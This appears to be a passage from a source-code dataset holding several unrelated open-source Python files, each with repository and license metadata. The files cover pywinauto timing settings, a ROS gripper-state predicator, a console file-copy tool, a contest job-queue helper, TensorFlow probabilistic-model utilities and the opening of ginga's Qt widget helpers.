# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Timing settings for all of pywinauto
This module has one object that should be used for all timing adjustments
timings.Timings
There are a couple of predefined settings
timings.Timings.Fast()
timings.Timings.Defaults()
timings.Timings.Slow()
The Following are the individual timing settings that can be adjusted:
* window_find_timeout (default 5)
* window_find_retry (default .09)
* app_start_timeout (default 10)
* app_start_retry (default .90)
* cpu_usage_interval (default .5)
* cpu_usage_wait_timeout (default 20)
* exists_timeout (default .5)
* exists_retry (default .3)
* after_click_wait (default .09)
* after_clickinput_wait (default .09)
* after_menu_wait (default .1)
* after_sendkeys_key_wait (default .01)
* after_button_click_wait (default 0)
* before_closeclick_wait (default .1)
* closeclick_retry (default .05)
* closeclick_dialog_close_wait (default 2)
* after_closeclick_wait (default .2)
* after_windowclose_timeout (default 2)
* after_windowclose_retry (default .5)
* after_setfocus_wait (default .06)
* setfocus_timeout (default 2)
* setfocus_retry (default .1)
* after_setcursorpos_wait (default .01)
* sendmessagetimeout_timeout (default .01)
* after_tabselect_wait (default .05)
* after_listviewselect_wait (default .01)
* after_listviewcheck_wait default(.001)
* after_treeviewselect_wait default(.1)
* after_toobarpressbutton_wait default(.01)
* after_updownchange_wait default(.1)
* after_movewindow_wait default(0)
* after_buttoncheck_wait default(0)
* after_comboboxselect_wait default(.001)
* after_listboxselect_wait default(0)
* after_listboxfocuschange_wait default(0)
* after_editsetedittext_wait default(0)
* after_editselect_wait default(.02)
* drag_n_drop_move_mouse_wait default(.1)
* before_drag_wait default(.2)
* before_drop_wait default(.1)
* after_drag_n_drop_wait default(.1)
* scroll_step_wait default(.1)
"""
import time
import operator
from functools import wraps
#=========================================================================
class TimeConfig(object):
"""Central storage and manipulation of timing values"""
__default_timing = {
'window_find_timeout' : 5.,
'window_find_retry' : .09,
'app_start_timeout' : 10.,
'app_start_retry' : .90,
'cpu_usage_interval' : .5,
'cpu_usage_wait_timeout' : 20.,
'exists_timeout' : .5,
'exists_retry' : .3,
'after_click_wait' : .09,
'after_clickinput_wait' : .09,
'after_menu_wait' : .1,
'after_sendkeys_key_wait' : .01,
'after_button_click_wait' : 0,
'before_closeclick_wait' : .1,
'closeclick_retry' : .05,
'closeclick_dialog_close_wait' : 2.,
'after_closeclick_wait' : .2,
'after_windowclose_timeout': 2,
'after_windowclose_retry': .5,
'after_setfocus_wait': .06,
'setfocus_timeout': 2,
'setfocus_retry': .1,
'after_setcursorpos_wait' : .01,
'sendmessagetimeout_timeout' : .01,
'after_tabselect_wait': .05,
'after_listviewselect_wait': .01,
'after_listviewcheck_wait': .001,
'after_treeviewselect_wait': .1,
'after_toobarpressbutton_wait': .01,
'after_updownchange_wait': .1,
'after_movewindow_wait': 0,
'after_buttoncheck_wait': 0,
'after_comboboxselect_wait': 0.001,
'after_listboxselect_wait': 0,
'after_listboxfocuschange_wait': 0,
'after_editsetedittext_wait': 0,
'after_editselect_wait': 0.02,
'drag_n_drop_move_mouse_wait': 0.1,
'before_drag_wait': 0.2,
'before_drop_wait': 0.1,
'after_drag_n_drop_wait': 0.1,
'scroll_step_wait': 0.1,
}
assert(__default_timing['window_find_timeout'] >=\
__default_timing['window_find_retry'] * 2)
_timings = __default_timing.copy()
_cur_speed = 1
def __getattribute__(self, attr):
"""Get the value for a particular timing"""
if attr in ['__dict__', '__members__', '__methods__', '__class__']:
return object.__getattribute__(self, attr)
if attr in dir(TimeConfig):
return object.__getattribute__(self, attr)
if attr in self.__default_timing:
return self._timings[attr]
else:
raise AttributeError("Unknown timing setting: {0}".format(attr))
def __setattr__(self, attr, value):
"""Set a particular timing"""
if attr == '_timings':
object.__setattr__(self, attr, value)
elif attr in self.__default_timing:
self._timings[attr] = value
else:
raise AttributeError("Unknown timing setting: {0}".format(attr))
def Fast(self):
"""Set fast timing values
Currently this changes the timing in the following ways:
timeouts = 1 second
waits = 0 seconds
retries = .001 seconds (minimum!)
(if existing times are faster then keep existing times)
"""
for setting in self.__default_timing:
# set timeouts to the min of the current speed or 1 second
if "_timeout" in setting:
self._timings[setting] = \
min(1, self._timings[setting])
if "_wait" in setting:
self._timings[setting] = self._timings[setting] / 2
elif setting.endswith("_retry"):
self._timings[setting] = 0.001
#self._timings['app_start_timeout'] = .5
def Slow(self):
"""Set slow timing values
Currently this changes the timing in the following ways:
timeouts = default timeouts * 10
waits = default waits * 3
retries = default retries * 3
(if existing times are slower then keep existing times)
"""
for setting in self.__default_timing:
if "_timeout" in setting:
self._timings[setting] = max(
self.__default_timing[setting] * 10,
self._timings[setting])
if "_wait" in setting:
self._timings[setting] = max(
self.__default_timing[setting] * 3,
self._timings[setting])
elif setting.endswith("_retry"):
self._timings[setting] = max(
self.__default_timing[setting] * 3,
self._timings[setting])
if self._timings[setting] < .2:
self._timings[setting]= .2
def Defaults(self):
"""Set all timings to the default time"""
self._timings = self.__default_timing.copy()
Timings = TimeConfig()
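# --- Illustrative usage (editor note, not part of the original module) ---
# A minimal sketch of how the singleton above is typically adjusted; the
# attribute names are the settings listed in the module docstring:
#
#   from pywinauto import timings
#   timings.Timings.window_find_timeout = 10   # wait up to 10 s for a window
#   timings.Timings.Fast()                     # or switch to the fast preset
#   timings.Timings.Defaults()                 # restore the default values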
#=========================================================================
class TimeoutError(RuntimeError):
pass
#=========================================================================
def always_wait_until(
timeout,
retry_interval,
value = True,
op = operator.eq):
"""Decorator to call wait_until(...) every time for a decorated function/method"""
def wait_until_decorator(func):
"""Callable object that must be returned by the @always_wait_until decorator"""
@wraps(func)
def wrapper(*args):
"""pre-callback, target function call and post-callback"""
return wait_until(timeout, retry_interval,
func, value, op, *args)
return wrapper
return wait_until_decorator
#=========================================================================
def wait_until(
timeout,
retry_interval,
func,
value = True,
op = operator.eq,
*args):
r"""Wait until ``op(function(*args), value)`` is True or until timeout expires
    * **timeout** how long (in seconds) to keep retrying the function
* **retry_interval** how long to wait between retries
* **func** the function that will be executed
* **value** the value to be compared against (defaults to True)
    * **op** the comparison function (defaults to equality)
* **args** optional arguments to be passed to func when called
Returns the return value of the function
    If the operation times out then the return value of the function
is in the 'function_value' attribute of the raised exception.
e.g. ::
try:
# wait a maximum of 10.5 seconds for the
# the objects item_count() method to return 10
# in increments of .5 of a second
wait_until(10.5, .5, self.item_count, 10)
except TimeoutError as e:
print("timed out")
"""
start = time.time()
func_val = func(*args)
# while the function hasn't returned what we are waiting for
while not op(func_val, value):
# find out how much of the time is left
time_left = timeout - ( time.time() - start)
# if we have to wait some more
if time_left > 0:
# wait either the retry_interval or else the amount of
# time until the timeout expires (whichever is less)
time.sleep(min(retry_interval, time_left))
func_val = func(*args)
else:
err = TimeoutError("timed out")
err.function_value = func_val
raise err
return func_val
# Non PEP-8 alias
WaitUntil = wait_until
#=========================================================================
def always_wait_until_passes(
timeout,
retry_interval,
exceptions = (Exception)):
"""Decorator to call wait_until_passes(...) every time for a decorated function/method"""
def wait_until_passes_decorator(func):
"""Callable object that must be returned by the @always_wait_until_passes decorator"""
@wraps(func)
def wrapper(*args):
"""pre-callback, target function call and post-callback"""
return wait_until_passes(timeout, retry_interval,
func, exceptions, *args)
return wrapper
return wait_until_passes_decorator
#=========================================================================
def wait_until_passes(
timeout,
retry_interval,
func,
exceptions = (Exception),
*args):
"""Wait until ``func(*args)`` does not raise one of the exceptions in exceptions
    * **timeout** how long (in seconds) to keep retrying the function
* **retry_interval** how long to wait between retries
* **func** the function that will be executed
* **exceptions** list of exceptions to test against (default: Exception)
* **args** optional arguments to be passed to func when called
Returns the return value of the function
If the operation times out then the original exception raised is in
the 'original_exception' attribute of the raised exception.
e.g. ::
try:
# wait a maximum of 10.5 seconds for the
# window to be found in increments of .5 of a second.
        # Print a message and re-raise the original exception if never found.
wait_until_passes(10.5, .5, self.Exists, (ElementNotFoundError))
except TimeoutError as e:
print("timed out")
        raise e
"""
start = time.time()
# keep trying until the timeout is passed
while True:
try:
# Call the function with any arguments
func_val = func(*args)
# if no exception is raised then we are finished
break
# An exception was raised - so wait and try again
except exceptions as e:
# find out how much of the time is left
time_left = timeout - ( time.time() - start)
# if we have to wait some more
if time_left > 0:
# wait either the retry_interval or else the amount of
# time until the timeout expires (whichever is less)
time.sleep(min(retry_interval, time_left))
else:
# Raise a TimeoutError - and put the original exception
# inside it
err = TimeoutError()
err.original_exception = e
raise err
# return the function value
return func_val
# Non PEP-8 alias
WaitUntilPasses = wait_until_passes
|
bsd-3-clause
| -3,935,834,530,646,250,000
| 31.676744
| 94
| 0.585181
| false
| 4.151663
| false
| false
| false
|
cpaxton/predicator
|
predicator_robotiq/src/predicator_robotiq/s_model.py
|
1
|
5702
|
# predicator (c) 2014-2016, Chris Paxton
#
# based on some code taken from Robotiq's s_model_control package:
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Robotiq, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Robotiq, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Copyright (c) 2012, Robotiq, Inc.
# Revision $Id$
import rospy
from robotiq_s_model_control.msg import SModel_robot_input as inputMsg
from predicator_msgs.msg import *
class SModelPredicator:
def __init__(self,publish_predicates=True,start_subscriber=True,gripper_name='s_model'):
self.valid_predicates = ValidPredicates(assignments=[gripper_name],predicates=['gripper_open','gripper_closed','gripper_moving',
'gripper_basic_mode','gripper_pinch_mode','gripper_wide_mode','gripper_scissor_mode','gripper_activated',
'finger_a_contact','finger_b_contact','finger_c_contact','any_finger_contact'])
self.predicate_msg = PredicateList()
self.gripper_name = gripper_name
self.gripper_mode = ''
self.activated = False
self.contact = False
self.closed = False
self.moving = False
if publish_predicates:
# create predicator things
self.pub = rospy.Publisher("predicator/input",PredicateList,queue_size=1000)
            self.vpub = rospy.Publisher("predicator/valid_predicates",ValidPredicates,queue_size=1000)
if start_subscriber:
self.sub = rospy.Subscriber("SModelRobotInput",inputMsg,self.callback)
self.name = rospy.get_name()
def callback(self, msg):
self.handle(msg)
def handle(self,status):
self.predicate_msg = PredicateList()
self.predicate_msg.pheader.source = self.name
if(status.gACT == 0):
# gripper reset
pass
        if(status.gACT == 1):
            self.addPredicate('gripper_activated')
            self.activated = True
        else:
            self.activated = False
if(status.gMOD == 0):
self.addPredicate('gripper_basic_mode')
self.gripper_mode = 'basic'
elif(status.gMOD == 1):
self.addPredicate('gripper_pinch_mode')
self.gripper_mode = 'pinch'
elif(status.gMOD == 2):
self.addPredicate('gripper_wide_mode')
self.gripper_mode = 'wide'
elif(status.gMOD == 3):
self.addPredicate('gripper_scissor_mode')
self.gripper_mode = 'scissor'
if ((status.gGTO == 1) # going to position (GOTO command)
or (status.gIMC == 2) # mode change in progress
or (status.gSTA == 0) # in motion towards position
):
self.addPredicate('gripper_moving')
self.moving = True
else:
self.moving = False
contact = False
if (status.gDTA == 1 or status.gDTA == 2):
self.addPredicate('finger_a_contact')
contact = True
if (status.gDTB == 1 or status.gDTB == 2):
self.addPredicate('finger_b_contact')
contact = True
if (status.gDTC == 1 or status.gDTC == 2):
self.addPredicate('finger_c_contact')
contact = True
self.contact = contact
if contact:
self.addPredicate('any_finger_contact')
if ((status.gDTA >= 2 and status.gDTB >= 2 and status.gDTC >= 2 and status.gPRA >= 250) # fingers closed or stopped closing
or (status.gDTS >=2 and status.gPRA >= 250) # scissor closing
):
self.addPredicate('gripper_closed')
self.closed = True
else:
self.closed = False
'''
add a single message
'''
def addPredicate(self,predicate):
p = PredicateStatement(predicate=predicate,params=[self.gripper_name,'',''])
self.predicate_msg.predicates.append(p)
'''
publish current predicate messages
'''
def tick(self):
self.pub.publish(self.predicate_msg)
self.vpub.publish(self.valid_predicates)
'''
update and spin
'''
def spin(self,rate=10):
spin_rate = rospy.Rate(rate)
while not rospy.is_shutdown():
self.tick()
spin_rate.sleep()
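# --- Illustrative usage (editor note, not part of the original module) ---
# A minimal sketch of running the predicator as a standalone node; the node
# name below is hypothetical:
#
#   import rospy
#   from predicator_robotiq.s_model import SModelPredicator
#
#   rospy.init_node("s_model_predicator")
#   SModelPredicator(publish_predicates=True, start_subscriber=True).spin()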
|
bsd-2-clause
| -316,624,933,566,636,700
| 36.025974
| 136
| 0.639951
| false
| 3.839731
| false
| false
| false
|
wkz/ccp
|
ccp.py
|
1
|
2743
|
#!/usr/bin/env python
import argparse
import base64
import re
import sys
import time
import pexpect
class StdioStream(object):
def pull(self):
return sys.stdin.read()
def push(self, data):
return sys.stdout.write(data)
class LocalStream(object):
def __init__(self, spec):
self.spec = spec
def pull(self):
return open(self.spec).read()
def push(self, data):
open(self.spec, "w").write(data)
class ConsoleStream(object):
PROMPT = re.compile(r"^.*[>#$] $", re.MULTILINE)
def __init__(self, cmd, spec):
self.cmd, self.spec = cmd, spec
self.proc = pexpect.spawn(cmd)
self.proc.sendline()
time.sleep(0.5)
self.proc.expect(ConsoleStream.PROMPT)
def _cmd(self, cmd):
self.proc.sendline(cmd)
self.proc.expect(ConsoleStream.PROMPT)
return self.proc.before[len(cmd):]
def _stty_raw(self):
settings = self._cmd("stty -g").strip()
self.stty = settings.splitlines()[0].strip()
self._cmd("stty raw")
return
def _stty_restore(self):
self._cmd("stty " + self.stty)
return
def pull(self):
data = self._cmd("base64 <%s" % self.spec)
return base64.b64decode(data)
def push(self, data):
b64 = base64.b64encode(data)
self._stty_raw()
self.proc.sendline("dd bs=1 count=%d | base64 -d >%s" %
(len(b64), self.spec))
self._cmd(b64)
self._stty_restore()
def stream(spec):
if spec == "-":
return StdioStream()
commfile = spec.split(":")
if len(commfile) == 1:
return LocalStream(commfile[0])
elif len(commfile) == 2:
return ConsoleStream(commfile[0], commfile[1])
return None
def get_opts():
argp = argparse.ArgumentParser(description="""
Console Copy
If COMM is given, it is assumed to be a valid command for interacting
with a remote UNIX like system. If COMM is not given, FILE may be "-";
in which case ccp will use stdio.
Examples:
Transfer a local file to a remote system connected via conserver:
$ ccp /tmp/data 'console -f ser1':/tmp/data
Grep in a remote file:
$ ccp 'screen /dev/ttyS0 115200':/tmp/data - | grep keyword
""", formatter_class=argparse.RawTextHelpFormatter)
argp.add_argument("src",
help="Source to copy from",metavar="[COMM:]FILE")
argp.add_argument("dst",
help="Destination to copy to", metavar="[COMM:]FILE")
opts = argp.parse_args()
return opts
def main():
opts = get_opts()
data = stream(opts.src).pull()
stream(opts.dst).push(data)
sys.exit(0)
if __name__ == '__main__':
main()
|
mit
| -219,096,259,822,455,140
| 22.646552
| 75
| 0.593146
| false
| 3.424469
| false
| false
| false
|
sio2project/oioioi
|
oioioi/evalmgr/utils.py
|
1
|
1149
|
import logging
import six
from oioioi.base.utils.db import require_transaction
from oioioi.contests.models import Submission
from oioioi.evalmgr.models import QueuedJob
logger = logging.getLogger(__name__)
@require_transaction
def mark_job_state(environ, state, **kwargs):
"""Sets status of given environ in job queue. Additional arguments are
used to update QueuedJob object. Returns True when the status was
set, and the job should be continued, False when it ought to be
ignored.
"""
if 'submission_id' in environ:
submission = Submission.objects.filter(id=environ['submission_id'])
if submission.exists():
kwargs['submission'] = submission.get()
kwargs['state'] = state
qj, created = QueuedJob.objects.get_or_create(
job_id=environ['job_id'], defaults=kwargs
)
if not created:
if qj.state == 'CANCELLED':
qj.delete()
logger.info('Job %s cancelled.', str(environ['job_id']))
return False
else:
for k, v in six.iteritems(kwargs):
setattr(qj, k, v)
qj.save()
    return True
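# --- Illustrative usage (editor note, not part of the original module) ---
# A minimal sketch of how a job handler might gate its work on the queue
# state; the 'PROGRESS' state name below is hypothetical:
#
#   @require_transaction
#   def handle_job(environ):
#       if not mark_job_state(environ, 'PROGRESS'):
#           return  # the job was cancelled while queued; ignore it
#       ...  # continue with the evaluation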
|
gpl-3.0
| -7,408,691,713,724,728,000
| 30.916667
| 75
| 0.642298
| false
| 3.868687
| false
| false
| false
|
google-research/google-research
|
eim/models/base.py
|
1
|
9889
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base class for models."""
from __future__ import absolute_import
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
def _safe_log(x, eps=1e-8):
return tf.log(tf.clip_by_value(x, eps, 1.0))
def get_squash(squash_eps=1e-6):
return tfp.bijectors.Chain([
tfp.bijectors.AffineScalar(scale=256.),
tfp.bijectors.AffineScalar(
shift=-squash_eps / 2., scale=(1. + squash_eps)),
tfp.bijectors.Sigmoid(),
])
class GSTBernoulli(tfd.Bernoulli):
"""Gumbel-softmax Bernoulli distribution."""
def __init__(self,
temperature,
logits=None,
probs=None,
validate_args=False,
allow_nan_stats=True,
name="GSTBernoulli",
dtype=tf.int32):
"""Construct GSTBernoulli distributions.
Args:
      temperature: A 0-D `Tensor` representing the temperature of a set of
GSTBernoulli distributions. The temperature should be positive.
logits: An N-D `Tensor` representing the log-odds of a positive event.
Each entry in the `Tensor` parametrizes an independent GSTBernoulli
distribution where the probability of an event is sigmoid(logits). Only
one of `logits` or `probs` should be passed in.
probs: An N-D `Tensor` representing the probability of a positive event.
Each entry in the `Tensor` parameterizes an independent Bernoulli
distribution. Only one of `logits` or `probs` should be passed in.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or more
of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
      dtype: Type of the Tensors.
Raises:
ValueError: If both `probs` and `logits` are passed, or if neither.
"""
with tf.name_scope(name, values=[logits, probs, temperature]) as name:
self._temperature = tf.convert_to_tensor(
temperature, name="temperature", dtype=dtype)
if validate_args:
with tf.control_dependencies([tf.assert_positive(temperature)]):
self._temperature = tf.identity(self._temperature)
super(GSTBernoulli, self).__init__(
logits=logits,
probs=probs,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
dtype=dtype,
name=name)
@property
def temperature(self):
"""Distribution parameter for the location."""
return self._temperature
def _sample_n(self, n, seed=None):
new_shape = tf.concat([[n], self.batch_shape_tensor()], 0)
u = tf.random_uniform(new_shape, seed=seed, dtype=self.probs.dtype)
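    # Transform uniform noise into a standard logistic sample via the inverse CDF.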
logistic = _safe_log(u) - _safe_log(1 - u)
hard_sample = tf.cast(tf.greater(self.logits + logistic, 0), self.dtype)
soft_sample = tf.math.sigmoid((self.logits + logistic) / self.temperature)
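    # Straight-through estimator: the forward value is the hard sample, while
    # gradients flow through the soft (relaxed) sample.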
sample = soft_sample + tf.stop_gradient(hard_sample - soft_sample)
return tf.cast(sample, self.dtype)
def mlp(inputs,
layer_sizes,
hidden_activation=tf.math.tanh,
final_activation=tf.math.log_sigmoid,
name=None):
"""Creates a simple fully connected multi-layer perceptron."""
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
inputs = tf.layers.flatten(inputs)
for i, s in enumerate(layer_sizes[:-1]):
inputs = tf.layers.dense(
inputs,
units=s,
activation=hidden_activation,
kernel_initializer=tf.initializers.glorot_uniform,
name="layer_%d" % (i + 1))
output = tf.layers.dense(
inputs,
units=layer_sizes[-1],
activation=final_activation,
kernel_initializer=tf.initializers.glorot_uniform,
name="layer_%d" % len(layer_sizes))
return output
def conditional_normal(inputs,
data_dim,
hidden_sizes,
hidden_activation=tf.math.tanh,
scale_min=1e-5,
truncate=False,
bias_init=None,
scale_init=1.,
nn_scale=True,
name=None):
"""Create a conditional Normal distribution."""
flat_data_dim = np.prod(data_dim)
if nn_scale:
raw_params = mlp(
inputs,
hidden_sizes + [2 * flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name)
loc, raw_scale = tf.split(raw_params, 2, axis=-1)
else:
loc = mlp(
inputs,
hidden_sizes + [flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name + "_loc")
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
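      # Inverse-softplus initialization so that softplus(raw_scale) starts near scale_init.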
raw_scale_init = np.log(np.exp(scale_init) - 1 + scale_min)
raw_scale = tf.get_variable(
name="raw_sigma",
shape=[flat_data_dim],
dtype=tf.float32,
initializer=tf.constant_initializer(raw_scale_init),
trainable=True)
scale = tf.math.maximum(scale_min, tf.math.softplus(raw_scale))
# Reshape back to the proper data_dim
loc = tf.reshape(loc, [-1] + data_dim)
scale = tf.reshape(scale, [-1] + data_dim)
# with tf.name_scope(name):
# tf.summary.histogram("scale", scale, family="scales")
# tf.summary.scalar("min_scale", tf.reduce_min(scale), family="scales")
if truncate:
if bias_init is not None:
loc = loc + bias_init
loc = tf.math.sigmoid(loc)
return tfd.Independent(
tfd.TruncatedNormal(loc=loc, scale=scale, low=0., high=1.),
reinterpreted_batch_ndims=len(data_dim))
else:
return tfd.Independent(tfd.Normal(loc=loc, scale=scale),
reinterpreted_batch_ndims=len(data_dim))
def conditional_bernoulli(inputs,
data_dim,
hidden_sizes,
hidden_activation=tf.math.tanh,
bias_init=None,
dtype=tf.int32,
use_gst=False,
temperature=None,
name=None):
"""Create a conditional Bernoulli distribution."""
flat_data_dim = np.prod(data_dim)
bern_logits = mlp(
inputs,
hidden_sizes + [flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name)
bern_logits = tf.reshape(bern_logits, [-1] + data_dim)
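  # Shift the logits by logit(bias_init) so a zero network output yields a mean of bias_init.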
if bias_init is not None:
bern_logits = bern_logits - tf.log(
1. / tf.clip_by_value(bias_init, 0.0001, 0.9999) - 1)
if use_gst:
assert temperature is not None
base_dist = GSTBernoulli(temperature, logits=bern_logits, dtype=dtype)
else:
base_dist = tfd.Bernoulli(logits=bern_logits, dtype=dtype)
return tfd.Independent(base_dist)
class SquashedDistribution(object):
"""Apply a squashing bijector to a distribution."""
def __init__(self, distribution, data_mean, squash_eps=1e-6):
self.distribution = distribution
self.data_mean = data_mean
self.squash = get_squash(squash_eps)
self.unsquashed_data_mean = self.squash.inverse(self.data_mean)
def log_prob(self, data, num_samples=1):
unsquashed_data = (self.squash.inverse(data) - self.unsquashed_data_mean)
log_prob = self.distribution.log_prob(unsquashed_data,
num_samples=num_samples)
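    # Change of variables: add the log-determinant of the inverse squash Jacobian.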
log_prob = (log_prob + self.squash.inverse_log_det_jacobian(
data, event_ndims=tf.rank(data) - 1))
return log_prob
def sample(self, num_samples=1):
samples = self.distribution.sample(num_samples)
samples += self.unsquashed_data_mean
samples = self.squash.forward(samples)
return samples
class ProbabilisticModel(object):
"""Abstract class for probablistic models to inherit."""
def log_prob(self, data, num_samples=1):
"""Reshape data so that it is [batch_size] + data_dim."""
batch_shape = tf.shape(data)[:-len(self.data_dim)]
reshaped_data = tf.reshape(data, [tf.math.reduce_prod(batch_shape)] +
self.data_dim)
log_prob = self._log_prob(reshaped_data, num_samples=num_samples)
log_prob = tf.reshape(log_prob, batch_shape)
return log_prob
def _log_prob(self, data, num_samples=1):
pass
def get_independent_normal(data_dim, variance=1.0):
"""Returns an independent normal with event size the size of data_dim.
Args:
data_dim: List of data dimensions.
variance: A scalar that is used as the diagonal entries of the covariance
matrix.
Returns:
Independent normal distribution.
"""
return tfd.Independent(
tfd.Normal(
loc=tf.zeros(data_dim, dtype=tf.float32),
scale=tf.ones(data_dim, dtype=tf.float32)*tf.math.sqrt(variance)),
reinterpreted_batch_ndims=len(data_dim))
|
apache-2.0
| -6,552,935,640,835,127,000
| 35.899254
| 80
| 0.631914
| false
| 3.67075
| false
| false
| false
|
stscieisenhamer/ginga
|
ginga/qtw/QtHelp.py
|
1
|
9071
|
#
# QtHelp.py -- customized Qt widgets and convenience functions
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import glob
import os
import math
import numpy
import ginga.toolkit
from ginga.util import iohelper
configured = False
toolkit = ginga.toolkit.toolkit
# if user wants to force a toolkit
if toolkit == 'qt5':
os.environ['QT_API'] = 'pyqt5'
elif toolkit == 'qt4':
os.environ['QT_API'] = 'pyqt'
elif toolkit == 'pyside':
os.environ['QT_API'] = 'pyside'
have_pyqt4 = False
have_pyqt5 = False
have_pyside = False
try:
from qtpy import QtCore
from qtpy import QtWidgets as QtGui
from qtpy.QtGui import QImage, QColor, QFont, QPixmap, QIcon, \
QCursor, QPainter, QPen, QPolygonF, QPolygon, QTextCursor, \
QDrag, QPainterPath, QBrush
from qtpy.QtCore import QItemSelectionModel
from qtpy.QtWidgets import QApplication
try:
from qtpy.QtWebEngineWidgets import QWebEngineView as QWebView
except ImportError as e:
pass
# Let's see what qtpy configured for us...
from qtpy import PYQT4, PYQT5, PYSIDE
have_pyqt4 = PYQT4
have_pyqt5 = PYQT5
have_pyside = PYSIDE
configured = True
except ImportError as e:
pass
if have_pyqt5:
ginga.toolkit.use('qt5')
os.environ['QT_API'] = 'pyqt5'
elif have_pyqt4:
ginga.toolkit.use('qt4')
os.environ['QT_API'] = 'pyqt'
elif have_pyside:
ginga.toolkit.use('pyside')
os.environ['QT_API'] = 'pyside'
else:
raise ImportError("Failed to configure qt4, qt5 or pyside. Is the 'qtpy' package installed?")
tabwidget_style = """
QTabWidget::pane { margin: 0px,0px,0px,0px; padding: 0px; }
QMdiSubWindow { margin: 0px; padding: 2px; }
"""
class TopLevel(QtGui.QWidget):
app = None
## def __init__(self, *args, **kwdargs):
## return super(TopLevel, self).__init__(self, *args, **kwdargs)
def closeEvent(self, event):
if not (self.app is None):
self.app.quit()
def setApp(self, app):
self.app = app
class ComboBox(QtGui.QComboBox):
def insert_alpha(self, text):
index = 0
while True:
itemText = self.itemText(index)
if len(itemText) == 0:
break
if itemText > text:
self.insertItem(index, text)
return
index += 1
self.addItem(text)
def delete_alpha(self, text):
index = self.findText(text)
self.removeItem(index)
def show_text(self, text):
index = self.findText(text)
self.setCurrentIndex(index)
def append_text(self, text):
self.addItem(text)
class VBox(QtGui.QWidget):
def __init__(self, *args, **kwdargs):
super(VBox, self).__init__(*args, **kwdargs)
layout = QtGui.QVBoxLayout()
# because of ridiculous defaults
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def addWidget(self, w, **kwdargs):
self.layout().addWidget(w, **kwdargs)
def setSpacing(self, val):
self.layout().setSpacing(val)
class HBox(QtGui.QWidget):
def __init__(self, *args, **kwdargs):
super(HBox, self).__init__(*args, **kwdargs)
layout = QtGui.QHBoxLayout()
# because of ridiculous defaults
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def addWidget(self, w, **kwdargs):
self.layout().addWidget(w, **kwdargs)
def setSpacing(self, val):
self.layout().setSpacing(val)
class FileSelection(object):
"""Handle Load Image file dialog from File menu."""
def __init__(self, parent_w):
self.parent = parent_w
self.cb = None
def popup(self, title, callfn, initialdir=None, filename=None):
"""Let user select and load file(s). This allows wildcards and
extensions, like in FBrowser.
Parameters
----------
title : str
Title for the file dialog.
callfn : func
Function used to open the file(s).
initialdir : str or `None`
Directory for file dialog.
filename : str
Filter for file dialog.
"""
self.cb = callfn
filenames = QtGui.QFileDialog.getOpenFileNames(
self.parent, title, initialdir, filename)
# Special handling for PyQt5, see
# https://www.reddit.com/r/learnpython/comments/2xhagb/pyqt5_trouble_with_openinggetting_the_name_of_the/
if ginga.toolkit.get_toolkit() == 'qt5':
filenames = filenames[0]
for filename in filenames:
